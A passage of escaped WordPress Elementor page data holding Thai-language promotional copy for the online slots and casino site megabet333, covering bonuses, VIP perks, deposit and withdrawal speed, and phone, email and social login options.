400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 